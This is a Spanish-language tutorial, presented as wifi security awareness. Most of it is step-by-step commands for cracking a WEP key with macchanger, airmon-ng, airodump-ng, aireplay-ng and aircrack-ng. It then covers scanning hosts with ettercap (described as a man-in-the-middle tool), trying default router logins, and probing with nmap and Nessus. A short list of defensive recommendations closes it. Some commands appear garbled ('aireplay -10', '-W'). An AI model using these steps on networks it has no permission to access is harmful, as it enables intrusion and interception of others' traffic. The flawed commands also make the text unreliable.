¿Es segura tu red wifi? ¿Utilizas contraseña WEP o WPA? Hackear wifis con aircrack, airodump y aireplay es muy sencillo. |
Aprender a hackear redes wifi es sólo para verificar que una red no es segura si utilizamos contraseña wep. |
Escrito por Manel Pérez |
Has cambiado la contraseña de tu router? Has elegido tu la contraseña wifi en tu router? Que protocolo de encriptación utiliza tu red wifi? En este tutorial quiero enseñar la importáncia de utilizar contraseña WPA para la connexión a wireless y la importáncia de cambiar la contraseña del router. Hay muchas personas con conocimientos básicos de informática que contratan adsl: para poder ver el correo electrónico, ver la cuenta bancária, mirar porno, chatear, aprender y mil motivos. Dichas personas reciben su kit adsl, lo connectan y a disfrutar. Pero estas personas no saben/desconocen que cualquiera puede connectarse a su red si no utilizan unas medidas de seguridad mínimas. Cualquiera que reciba señal de su nuevo router wifi puede descifrar su contraseña, conectarse a su red y eliminar la privacidad de estas personas. ::Como descifrar una contraseña WEP en pocos minutos: Requerimientos: - Una distribución de Linux (ej:Ubuntu) - Una tarjeta de red wifi que soporte escucha e inyección de paquetes (ej:Conceptronic C54RU) Paquetes necessarios: - aircrack (Desencriptar WEP) Comando de instalación: sudo apt-get install aircrack-ng - macchanger (Cambiar MAC[MAC es como el DNI de nuestra tarjeta) Comando de instalación: sudo apt-get install macchanger Pasos a seguir: 1)Cambiamos la MAC de nuestra tarjeta wifi sudo macchanger -m 11:22:33:44:55:66 eth1 donde pone eth1 hay que poner el nombre de la tarjeta wifi suele ser: eth1 o wlan0. Se puede buscar con el comando ifconfig. 2)Ponemos el dispositivo en modo escucha: sudo airmon-ng start wlan0 Nos a de responder mode monitor enlable 3)Buscamos redes: sudo airodump-ng mon0Si tienes mas de una tarjeta red el mon0 podría ser mon1. 4)Filtramos sobre la red que se quiere desencriptar: sudo airodump-ng -c 1 --bssid MAC_RED -W fichero_out mon0 Donde el 1 es el canal, MAC_RED es la mac de la red a desencriptar y fichero_out es el fichero nos servirá para descifrar la contraseña más adelante. 5)Associamos con el AP para poder inyectar paquetes: sudo aireplay -10 -e NOMBRE_DE_LA_RED mon0 Nos ha de responder Association succeful 6)Inyección de paquetes: [En nuevo terminal] sudo aireplay-ng -3 -x 600 -b MAC_RED -h NUESTRA_MAC mon0 Aqui hay que esperar a conseguir un ARP. Paciencia en cuanto tengamos uno la cosa se acelera mucho. La clave es tener muchos ARP pero tranquilo pasa de 1 a 10.000 en un momento, lo que tarda es en conseguir el primero. Mirar el terminal donde tenemos el airodump cuando veais mucho movimiento, esperar 5 minutos y listo ya podemos desencriptar. 7)Desencriptar contraseña: sudo aircrack-ng -z fichero_out.cap o en caso de tener varios ficheros sudo aircrack-ng -z fichero_out*.cap ::Despues de conectarse a la red que se puede hacer? Se pueden buscar hosts para localizar el router con la aplicación ettercap, opcion buscar hosts. Si tienen firewall como ZoneAlarm lo más seguro que se haya de recurrir a otras técnicas para localizar los hosts. 1)Instalamos ettercap sudo apt-get install ettercap-gtk 2)Abrimos la interfaz gráfica de ettercap sudo ettercap -G 3)Seleccionamos sniff->Unified Sniffing-> seleccionamos la interfaz con la que estamos conectados. 4)Seleccionamos hosts-> Scan for hosts para buscar hosts y el router. Ettercap es el típico ejemplo de aplicación que permite hacer un ataque tipo man in the middle. Este ataque quita la confidencialidad de los datos y privacidad del individuo. ::Una vez localizada la ip del router que hacer ? Una vez se ha localizado la ip del router se puede comprovar si el usuario ha modificado la contraseña de este. Hay un sinfin de páginas con nombres de usuario y contraseñas que vienen por defecto en los routers. Lo más abitual es que el nombre de usuario sea: admin y la contraseña sea: admin. ::Que más se puede hacer? Una vez echo todo esto se pueden buscar vulnerabilidades con scaners como Nessus o puertos abiertos, servicios e información de los hosts con nmap. ::Como se puede evitar que pase esto? La respuesta acertada es con unos mínimos de seguridad y sentido común. Lista de recomendaciones ordenadas de más importante a menos, según mi opinion. 1)Modificar la contraseña del router. No modificar-la es como un chiste. 2)Utilizar un protocolo de encriptación menos débil como WPA. 3)Hacer un filtrado de direcciones MAC para decidir que dispositivos se pueden conectar a la red. Por lo menos hará al atacante esforzarse un poco más. 4)Deshabilitar el servidor DHCP. 5)Utilizar firewall en los ordenadores así como tener el S.O actualizado. (En otro contexto debería ser la primera) 6)No aceptar certificados en sitios donde normalmente no nos pide aceptar nada (Ej:msn, página del banco,hotmail,paypal,etc..). El tema del certificado es típico en ataques man in the middle. 7)Puede ser conveniente apagar el router si no se utiliza.. |